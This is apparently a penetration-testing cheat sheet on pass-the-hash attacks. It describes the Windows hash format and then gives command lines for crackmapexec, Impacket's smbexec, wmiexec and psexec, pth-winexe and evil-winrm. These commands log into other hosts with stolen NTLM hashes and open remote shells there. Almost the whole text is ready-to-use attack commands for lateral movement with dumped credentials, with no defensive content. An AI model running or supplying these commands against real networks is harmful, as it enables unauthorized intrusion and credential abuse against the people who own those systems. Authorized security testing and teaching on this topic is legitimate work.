Pass the Hash
Overview
Dumped the SAM or LSA and now have hashes for domain or a local users. Use the hash and crackmapexec
to pass it around the network and see if we can log into any other target(s) with that credential
Anatomy of a Windows Hash
username:SID:LM_HASH:NT_HASH::
- The LM hash is stored for backward compatibility
- The NT hash is used when authenticating to server by IP address or unregistered hostname
- Otherwise, Kerberos is likely going to be used
Attack 1: crackmapexec --local-auth
Assumes you have the NTLM hash of a local user from SAM database
crackmapexec smb <target-or-CIDR> -u "username" -H NT_HASH --local-auth
Attack 2: smbexec.py
smbexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target'
Attack 3: wmiexec.py
wmiexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe
Attack 4: psexec.py
Assumes you have the NTLM hash of a local user from SAM database Also assumes the local user has SMB write access to a share on the target
psexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe
Attack 5: pth-winexe
pth-winexe -U 'domain.tld/username%lm-hash:nt-hash' cmd.exe
Attack 6: WinRM
- WinRM over HTTP –
TCP/5985
- WinRM over HTTPS –
TCP/5986
Evil WinRM on Attack Box
evil-winrm -i <target_ip> -u username -H <hash>